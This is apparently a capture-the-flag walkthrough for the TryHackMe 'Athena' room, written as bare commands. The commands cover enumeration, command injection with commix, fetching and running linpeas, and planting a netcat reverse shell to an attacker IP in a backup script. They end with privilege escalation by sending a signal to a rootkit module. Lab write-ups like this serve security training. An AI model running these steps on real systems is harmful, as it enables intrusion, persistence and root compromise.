Athena
Room Link: https://tryhackme.com/r/room/4th3n4
Scans
Initial scan
Kali
nmap -A $VICTIM

Longer scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/139 - NetBIOS
Kali
nbtscan $VICTIM

Kali
enum4linux $VICTIM

TCP/445 - SMB
Kali
smbclient \\\\$VICTIM\\public
prompt
mget *

TCP/80 - HTTP
Find Pages
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt



Initial Shell
Shell #1

Kali
git clone https://github.com/commixproject/commix.git commix
cd commix/
python commix.py -r ../request.txt

Shell #2
Kali
nc -lvnp 1337


Full TTY
script -qc /bin/bash /dev/null
ctrl + Z
stty raw -echo;fg
Lateral Movement
LinPeas
Kali
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 82
Victim
cd /tmp/
wget http://$KALI:82/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh


Kali
nc -lvnp 1338
Victim
echo '#!/bin/bash' > /usr/share/backup/backup.sh
echo "/usr/bin/nc 10.10.35.7 1338 -e /bin/bash" >> /usr/share/backup/backup.sh

Full TTY
script -qc /bin/bash /dev/null
ctrl + Z
stty raw -echo;fg
Privilege Escalation
Victim(athena)
sudo -l

Victim(athena)
cd /mnt/.../secret/
modinfo venom.ko

Victim(athena)
kill -57 271
id

Last updated